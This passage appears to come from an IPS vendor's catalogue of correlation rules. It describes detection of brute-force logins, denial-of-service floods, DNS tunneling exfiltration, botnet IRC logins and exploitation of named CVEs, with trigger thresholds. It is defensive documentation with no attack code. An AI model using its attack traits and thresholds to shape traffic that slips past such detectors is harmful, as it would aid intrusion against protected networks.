First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Description: An insecure library loading vulnerability has been reported in AutoCAD. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an AutoCAD file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application. CVE-2014-0819
Back to top

Analyzer_Autodesk-Autocad-Insecure-Library-Loading-2

About this situation: A vulnerability in Autodesk AutoCAD
Context: Sequence
Severity: 5
Tags: Suspected Compromise, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Description: An insecure library loading vulnerability has been reported in AutoCAD. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an AutoCAD file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application. CVE-2014-0819
Back to top

Analyzer_BBA-Multiple-Failed-Login-Attempts-High-Threshhold

About this situation: Multiple failed BBA login attempts from a single source
Context: Count
Severity: 7
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed BBA login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_BBA-Multiple-Failed-Login-Attempts-Low-Threshhold

About this situation: Multiple failed BBA login attempts from a single source
Context: Count
Severity: 5
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed BBA login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_BBA-Multiple-Failed-Login-Attempts-Medium-Threshhold

About this situation: Multiple failed BBA login attempts from a single source
Context: Count
Severity: 6
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed BBA login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_Cisco-Remote-Access-VPN-Password-Brute-Force

About this situation: An attempt to perform password brute-force against Cisco VPN server was detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Suspected Compromise
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Description: There have been a large number of Cisco VPN's login failures in a small period of time. This could be an indicator of a password brute-force/spray attack or a denial-of-service attack.
Back to top

Analyzer_Compress-Broken-TCP-Options

About this situation: Compressing Broken TCP related log entries to avoid log flooding
Context: Compress
Severity: 1
Tags: Any Operating System, Any Operating System not specific, Other Suspicious Traffic, Compression and Count Events
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-306-4219
Description: TCP packets with broken options have been detected. These are compressed to avoid log flooding. Broken TCP options are accepted by most TCP/IP stacks, so it might be legitimate traffic.
Back to top

Analyzer_Compress-DoS

About this situation: Compressing Denial of Service-related log entries to avoid log flooding
Context: Compress
Severity: 1
Tags: Any Operating System, Any Operating System not specific, Other Suspicious Traffic, Compression and Count Events
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-306-4219
Description: A denial of Service attack is taking place. DoS-related logs are being compressed to avoid log flooding.
Back to top

Analyzer_Compress-Multiple-Matches

About this situation: Situation repeated multiple times
Context: Compress
Severity: 1
Tags: Any Operating System, Any Operating System not specific, Other Suspicious Traffic, Compression and Count Events
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-306-4219
Description: The situation repeated multiple times. The repeated situations were compressed.
Back to top

Analyzer_Compress-SIDs

About this situation: Situation repeated multiple times
Context: Compress
Severity: 1
Tags: Any Operating System, Any Operating System not specific, Other Suspicious Traffic, Compression and Count Events
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: The situation repeated multiple times. The repeated situations were compressed.
Back to top

Analyzer_CUPS-Denial-Of-Service

About this situation: Analyzer CUPS Denial-of-Service
Context: Count
Severity: 7
Tags: Denial of Service, Compression and Count Events
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Description: There have been a large number of unusual IPP requests to UDP port 631 (cups-browsed service) between the same source and destination in the last 30 seconds. This likely indicates that the system is being used in a denial-of-service attack.
Back to top

Analyzer_Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Digium Astersk was deteceted
Context: Count
Severity: 6
Tags: Compression and Count Events, UDP Correlation Dependency Group, Potential Denial of Service
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-632-5211
Vulnerability: Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Description: An attempt to exploit a denial of service vulnerbility in Digium Asterisk was detected. In particular, a excessive number of IAX NEW requests was seen.
Back to top

Analyzer_DirectConnect-Client-To-Client-Handshake-DDoS

About this situation: DirectConnect client-to-client handshake DDoS attack
Context: Count
Severity: 8
Tags: Compression and Count Events, TCP Client Traffic, Denial of Service
First detected in: sgpkg-ips-245-3038
Last changed: sgpkg-ips-245-3038
Description: There have been 100 sequential DirectConnect client-to-client handshakes to the SMTP or HTTP server port. This indicates that the server is under a DDoS attack.
Back to top

Analyzer_DNS-Any-Queries-Brute-Force

About this situation: Analyzer brute-force with DNS queries type ANY
Context: Count
Severity: 7
Tags: Suspected Disclosure, Compression and Count Events
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Description: An ANY query is a type of DNS query that retrieves all records available for a domain name. There have been a large number of such queries in a short period of time. This could be an indicator of a brute-force or denial-of-service attack.
Back to top

Analyzer_DNS-Cache-Poisoning

About this situation: DNS additional record cache poisoning
Context: Group
Severity: 7
Tags: Any Operating System, Potential Compromise
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-161-2032
Description: There have been 100 out of state DNS responses (no DNS request seen) within 5 seconds with one or more additional records with the same IP addresses and ports of the sender and target host. This indicates that a DNS cache poisoning attack attempt is likely happening.
Back to top

Analyzer_DNS-Tunneling

About this situation: Analyzer DNS Tunneling
Context: Count
Severity: 7
Tags: Potential Disclosure, Compression and Count Events
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Description: There have been a large number of unusual DNS requests, which contain long domain names with mixed letters and digits, between the same source and destination in the last 60 seconds. This could be an indicator of DNS tunneling, which a malicious actor from inside the company's network uses to exfiltrate data via DNS. Note that this analyzer may produce false positives as some legitimate applications have similar behaviors.
Back to top

Analyzer_DTLS-Connection-Flood

About this situation: Analyzer DTLS connection flood
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Description: There have been a large number of DTLS connections from the same source during the last 5 seconds. This may indicate a denial-of-service (DoS) attack or an attempt to exploit a race-condition related vulnerability.
Back to top

Analyzer_Executable-Download-After-Attack

About this situation: Attack followed by executable download
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-222-3038
Description: This situation detects executable transfers after an attack.
Back to top

Analyzer_Executable-Download-After-Potential-Compromise

About this situation: Potential compromise followed by executable download
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects executable transfers after a potential compromise.
Back to top

Analyzer_Executable-Download-After-Suspected-Attack

About this situation: Suspected attack followed by executable download
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects executable transfers after an suspected attack.
Back to top

Analyzer_Executable-Download-IRC-Login-Sequence

About this situation: Executable download followed by IRC login
Context: Sequence
Severity: 6
Tags: Potential Compromise, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1531-5242
Description: After downloading an executable an IRC login has occured from the same address. It is possible that the executable was hostile and that the host has become a bot for a botnet controlled from an IRC channel. It is also possible that this is a false positive.
Back to top

Analyzer_Executable-Upload-After-Attack

About this situation: Attack followed by executable upload
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-222-3038
Description: This situation detects executable transfers after an attack.
Back to top

Analyzer_Executable-Upload-After-Potential-Compromise

About this situation: Potential compromise followed by executable upload
Context: Sequence
Severity: 8
Tags: Suspected Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects executable transfers after a potential compromise.
Back to top

Analyzer_Executable-Upload-After-Suspected-Attack

About this situation: Suspected attack followed by executable upload
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects executable transfers after an suspected attack.
Back to top

Analyzer_Forcepoint-SSLVPN-Password-Brute-Force

About this situation: An attempt to perform password brute-force against Forcepoint SSLVPN was detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Suspected Compromise
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Description: There have been a large number of Forcepoint SSLVPN's login failures in a small period of time. This could be an indicator of a password brute-force/spray attack or a denial-of-service attack.
Back to top

Analyzer_FTP-Brute-Force

About this situation: Analyzer FTP Brute Force
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-342-4219
Description: There have been 10 sequential failed attempts to login into an FTP server meaning that brute force attack is likely happening. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_FTP-Brute-Force-Attack-Success

About this situation: Analyzer FTP Brute Force Success
Context: Sequence
Severity: 9
Tags: Successful Attacks, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-131-2032
Description: A brute force attack on an FTP server has been detected. During this attack a correct username and password were guessed and the remote intruder succesfully logged into the target FTP server
Back to top

Analyzer_FTP-Multiple-Empty-Transfers

About this situation: Analyzer FTP Multiple Empty Transfers
Context: Count
Severity: 5
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Description: There have been 40 sequential FTP sessions with no data transfers. This may indicate a Denial of Service attempt.
Back to top

Analyzer_Generic-Fp-Correlation-ShellCode-Uid-Pair

About this situation: Shellcode with a correlated response detected
Context: Sequence
Severity: 7
Tags: Any Operating System, Any Software, Any Operating System not specific, Any Software not specific, Successful Attacks, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: Shellcode and a correlated response from the target system were detected. It is probable that the target system was compromised.
Back to top

Analyzer_HTTP-Services-Authentication-Reflection

About this situation: HTTP Services Authentication Reflection
Context: Sequence
Severity: 6
Tags: Potential Compromise, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: HTTP_Microsoft-HTTP-Services-Authentication-Reflection
Description: NTLM authentication has occurred over HTTP to a server that connects back to the client and also uses NTLM authentication. This situation should rarely occur in normal traffic, and is likely an attack against the Microsoft HTTP Services authentication reflection vulnerability.
Back to top

Analyzer_HTTP-Version-Bad-Uri

About this situation: Non-allowed HTTP version and malicious URI request
Context: Group
Severity: 7
Tags: Any Operating System, Any Operating System not specific, Compromise, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-106-2032
Description: The client sent an HTTP request with a malicious URI, using a non-allowed HTTP version.
Back to top

Analyzer_HTTP2-Rapid-Reset-Denial-of-Service

About this situation: Analyzer HTTP2 Rapid Reset Denial of Service
Context: Count
Severity: 7
Tags: Denial of Service, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Description: There have been 500 HTTP/2 RST_STREAM frames observed in the same connection during the last 5 seconds. This is likely an attempt to exploit CVE-2023-44487 Rapid Reset vulnerability in HTTP/2 protocol.
Back to top

Analyzer_HTTP2-Reset-Flood-Suspected-Denial-of-Service

About this situation: Analyzer HTTP2 Reset Flood Suspected Denial of Service
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Description: There have been 100 HTTP/2 RST_STREAM frames observed from the same source during the last 5 seconds. This may be an attempt to exploit CVE-2023-44487 in HTTP/2 protocol or CVE-2019-9514 in Microsoft Windows operating system.
Back to top

Analyzer_ISC-Bind-Denial-of-Service

About this situation: A denial of service vulnerability in ISC Bind
Context: Count
Severity: 7
Tags: Compression and Count Events, UDP Correlation Dependency Group, Potential Denial of Service, BIND
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Isc-Bind-Recursive-Resolver-Resource-Consumption-Denial-Of-Service
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is due to a design weakness in the way BIND follows DNS delegations. A remote attacker can exploit these vulnerabilities by sending a request to a recursive resolver forcing the resolver to issue a large number (possibly infinite) of queries. A successful attack could lead to resource exhaustion resulting in a denial of service condition. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_ISC-Bind-RPZ-Query-Denial-of-Service

About this situation: A denial of service vulnerability in ISC Bind
Context: Count
Severity: 7
Tags: Compression and Count Events, UDP Correlation Dependency Group, Possibly Unwanted Content, BIND
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is due to a design weakness in the way BIND parses RPZ Queries. A remote attacker can exploit these vulnerabilities by sending multiple forged packets causing the parser to reach an infinite loop on a specific configuration. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_ISC-DHCP-Server-OMAPI-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC DHCP Server detected
Context: Group
Severity: 7
Tags: Any Operating System, Suspected Compromise
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: ISC-DHCP-Server-Omapi-Denial-Of-Service
Description: A denial of service vulnerability has been reported in ISC DHCP Server. This vulnerability is due to improper clean up of closed OMAPI connections. A remote attacker can exploit this vulnerability by initiating many OMAPI connections with a vulnerable server. Successful exploitation results in denial-of-service conditions on the server's OMAPI interface.
Back to top

Analyzer_Java-Class-Download-After-Log4j-Suspected-Compromise

About this situation: Java class file download followed by suspected compromise
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Description: This situation detects Java class file transfers after Log4j suspected compromise.
Back to top

Analyzer_Kerberos-Brute-Force

About this situation: Analyzer Kerberos Brute Force
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-320-4219
Description: There have been 10 sequential failed attempts to authenticate to a Kerberos server. This means that a brute force attack is likely taking place.
Back to top

Analyzer_Log-Flood-Protection

About this situation: Denial of Service, 5000 events in 10 minutes
Context: Compress
Severity: 1
Tags: Any Operating System, Any Operating System not specific, Other Suspicious Traffic, Compression and Count Events
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-306-4219
Description: The IPS has generated a multitude of similar log events. The related events are compressed. Block listing must _NOT_ be used with this situation.
Back to top

Analyzer_Logsign-Unified-Secops-CVE-2025-1044-Authentication-Bypass

About this situation: A 2FA brute force attack against Logsign Unified SecOps was detected
Context: Count
Severity: 9
Tags: Compression and Count Events, TCP Server Traffic, Suspected Compromise
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Description: There have been a large number of failed Logsign Unified SecOps authentication attempts in a small period of time. This could be an indicator of a 2FA brute force attack.
Back to top

Analyzer_LOIC-HTTP-Denial-Of-Service

About this situation: LOIC HTTP Denial of Service attack detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Denial of Service
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-507-5211
Vulnerability: LOIC-DoS-Tool
Description: At least 10 sequential LOIC (Low Orbit Ion Cannon) HTTP requests have been detected. This may be a sign of an ongoing denial of service attack. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Loop-DoS-Using-DNS

About this situation: Analyzer Loop Denial-of-Service attack using DNS
Context: Count
Severity: 7
Tags: Suspected Denial of Service, Compression and Count Events
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Description: In a loop denial-of-service (DoS) attack, the attacker creates application-layer loops in which two network services keep responding to each others' messages. For example, imagine two services that respond with an error message when receiving an error message as input. If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely. Such loop behaviors have been discovered to exist in certain TFTP, DNS and NTP implementations.This correlation analyzer detects loop DoS attacks using DNS.
Back to top

Analyzer_Loop-DoS-Using-NTP

About this situation: Analyzer Loop Denial-of-Service attack using NTP
Context: Count
Severity: 7
Tags: Suspected Denial of Service, Compression and Count Events
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Description: In a loop denial-of-service (DoS) attack, the attacker creates application-layer loops in which two network services keep responding to each others' messages. For example, imagine two services that respond with an error message when receiving an error message as input. If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely. Such loop behaviors have been discovered to exist in certain TFTP, DNS and NTP implementations.This correlation analyzer detects loop DoS attacks using NTP.
Back to top

Analyzer_Loop-DoS-Using-TFTP

About this situation: Analyzer Loop Denial-of-Service attack using TFTP
Context: Count
Severity: 7
Tags: Suspected Denial of Service, Compression and Count Events
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Description: In a loop denial-of-service (DoS) attack, the attacker creates application-layer loops in which two network services keep responding to each others' messages. For example, imagine two services that respond with an error message when receiving an error message as input. If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely. Such loop behaviors have been discovered to exist in certain TFTP, DNS and NTP implementations.This correlation analyzer detects loop DoS attacks using TFTP.
Back to top

Analyzer_Microsoft-ASP.NET-Denial-Of-Service-MS09-036

About this situation: MS09-036
Context: Group
Severity: 7
Tags: Windows, Denial of Service, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Description: An attempt to exploit a denial of service vulnerability in Microsoft ASP.NET was detected. The CVE identifier number CVE-2009-1536 has been assigned to this vulnerability.
Back to top

Analyzer_Microsoft-ASP.NET-Information-Disclosure-CVE-2010-3332

About this situation: Information disclosure attack against Microsoft ASP.NET detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Potential Disclosure
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Description: An attempt to exploit an information disclosure vulnerability (CVE-2010-3332) in Microsoft ASP.NET has been detected.
Back to top

Analyzer_Microsoft-Login-Brute-Force

About this situation: A password brute-force/spray attack against Microsoft accounts was detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Suspected Compromise
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Description: There have been a large number of failed Microsoft login attempts in a small period of time. This could be an indicator of a password brute-force/spray attack against Microsoft accounts.
Back to top

Analyzer_Microsoft-Message-Queuing-Connection-Flood

About this situation: Analyzer Microsoft Message Queuing (MSMQ) Connection Flood
Context: Count
Severity: 7
Tags: Suspected Disclosure, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1809-5242
Last changed: sgpkg-ips-1809-5242
Description: This analyzer detects when there are a large number of Microsoft Message Queuing (MSMQ) connections between the same source and destination in a short period of time. It could be an indicator of a denial-of-service attack or a race condition exploit (e.g., CVE-2024-49122).
Back to top

Analyzer_Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080

About this situation: A vulnerability in Microsoft Message Queuing Service
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Description: A potential attempt to exploit a remote code execution vulnerability (CVE-2024-30080) in Microsoft Windows Message Queuing Service has been detected. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Microsoft-Remote-Desktop-Brute-Force

About this situation: Analyzer Microsoft Remote Desktop Brute Force
Context: Count
Severity: 9
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise, TCP Client Traffic
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: There have been 10 sequential failed attempts to authenticate to a remote desktop service. This means that a brute force attack is likely taking place.
Back to top

Analyzer_Microsoft-Windows-DHCP-Server-MADCAP-Denial-Of-Service-CVE-2024-30019

About this situation: A vulnerability in Microsoft Windows
Context: Count
Severity: 7
Tags: Compression and Count Events, UDP Correlation Dependency Group, Potential Compromise
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Description: A large amount of Multicast Address Dynamic Client Allocation Protocol (MADCAP) REQUEST messages was seen from the same source address. This could potentially indicate an attempt to exploit CVE-2024-30019, a denial of service vulnerability in the DHCP Server component of Microsoft Windows. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Microsoft-Windows-HTTP2-Ping-Flood-Denial-of-Service

About this situation: Analyzer Microsoft Windows HTTP2 Ping Flood Denial of Service
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Description: There have been 100 HTTP/2 PING frames observedfrom the same source during the last 5 seconds. This may be an attempt to exploit CVE-2019-9512, a vulnerability in Microsoft Windows operating system.
Back to top

Analyzer_Microsoft-Windows-HTTP2-Resource-Loop-Denial-Of-Serice

About this situation: Analyzer Microsoft Windows HTTP2 Resource Loop Denial of Service
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Description: There have been 100 HTTP/2 PRIORITY frames observed from the same source during the last 10 seconds. This may be an attempt to exploit CVE-2019-9513, a vulnerability in Microsoft Windows operating system.
Back to top

Analyzer_Microsoft-Windows-HTTP2-Settings-Flood-Denial-of-Service

About this situation: Analyzer Microsoft Windows HTTP2 Settings Flood Denial of Service
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Description: There have been 50 HTTP/2 SETTINGS frames observed from the same source during the last 5 seconds. This may be an attempt to exploit CVE-2019-9515, a vulnerability in Microsoft Windows operating system.
Back to top

Analyzer_Microsoft-Windows-HTTP2-Window_Update-Flood-Denial-of-Service

About this situation: Analyzer Microsoft Windows HTTP2 Window_Update Flood Denial of Service
Context: Count
Severity: 5
Tags: Potential Denial of Service, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1236-5242
Description: There have been 500 HTTP/2 WINDOW_UPDATE frames observed from the same source during the last 5 seconds. This may be an attempt to exploit CVE-2019-9511, a vulnerability in Microsoft Windows operating system.
Back to top

Analyzer_Microsoft-Windows-iSCSI-Target-CVE-2014-0255-Denial-Of-Service

About this situation: A vulnerability in Microsoft Windows Server
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Suspected Compromise
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Description: A large number of Login Requests have been detected in a short period of time from a single IP address. This may be an attempt to exploit the CVE-2014-0255 Denial Of Service vulnerability in Microsoft Windows iSCSI. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Microsoft-Windows-LSASS-Recursive-Stack-Overflow

About this situation: Detected an attempt to exploit a stack overflow vulnerability in Microsoft Windows detected
Context: Count
Severity: 6
Tags: Compression and Count Events, TCP Client Traffic, Potential Denial of Service
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-342-4219
Vulnerability: Microsoft-Windows-LSASS-Recursive-Stack-Overflow
Description: An attempt to exploit a stack overflow vulnerability in Microsoft Windows was detected.
Back to top

Analyzer_Microsoft-Windows-RDP-WebSocket-Server-Use-After-Free-CVE-2024-43582

About this situation: A vulnerability in Microsoft Windows RDP WebSocket Server
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-1817-5242
Last changed: sgpkg-ips-1817-5242
Description: A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to a use-after-free condition triggered in the WebSocketServer component of the Remote Desktop Protocol Server when handling unexpected WebSocket disconnections. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation could result in execution of arbitrary code in the context of the vulnerable service. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Microsoft-Windows-Remote-Procedure-Call-Vulnerability

About this situation: A vulnerability Microsoft Windows RPC
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Suspected Compromise
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-537-5211
Vulnerability: Microsoft-Windows-Remote-Procedure-Call-Vulnerability
Description: An attempt to exploit an elevation of privilege vulnerability (CVE-2013-3175) in Microsoft Windows has been detected. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Microsoft-Windows-Smb-Server-Ntlm-Authentication-Bypass-CVE-2010-0231

About this situation: NTLM authentication bypass attack against Microsoft Windows SMB server detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-284-4219
Last changed: sgpkg-ips-342-4219
Description: An attempt to exploit an NTLM authentication lack of entropy vulnerability (CVE-2010-0231) in Microsoft Windows SMB server has been detected.
Back to top

Analyzer_MySQL-Brute-Force

About this situation: Analyzer MySQL Brute Force
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Suspected Compromise
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: MySQL-And-MariaDB-Incorrect-Cast-Policy-Bypass-Vulnerability
Description: There have been 10 sequential failed attempts to login into an MySQL server meaning that brute force attack is likely happening. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_MySQL-InnoDB-Memcached-Plugin-Resource-Exhaustion

About this situation: MySQL Memcached Resource Exhaustion attack detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Oracle-Mysql-Server-Innodb-Memcached-Plugin-Resource-Exhaustion
Description: Over 100 simultaneous memcached requests from shared host were detected. This may indicate a resource exhaustion attack such as CVE-2013-1570. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Nessus-Vulnerability-Scanner-Usage

About this situation: Analyzer Nessus usage detection
Context: Count
Severity: 3
Tags: Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Description: Five Nessus vulnerability scanner related situations have matched between two hosts within the last 6 minutes. This indicates that Nessus is used to scan the destination host.
Back to top

Analyzer_NTP-Mode-7-Denial-Of-Service

About this situation: NTP mode 7 (MODE_PRIVATE) denial of service
Context: Match
Severity: 9
Tags: Any Operating System, Potential Denial of Service
First detected in: sgpkg-ips-273-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: Ntp-Mode-7-Denial-Of-Service
Description: An NTP mode 7 (MODE_PRIVATE) message with a source and destination port set to 123 has been detected. This indicates a denial of service attack against Network Time Protocol (NTP) daemon.
Back to top

Analyzer_OpenSSL-DTLS-Recursion-Denial-Of-Service-CVE-2014-0221

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: Count
Severity: 6
Tags: Compression and Count Events, UDP Correlation Dependency Group, Suspected Denial of Service
First detected in: sgpkg-ips-593-5211
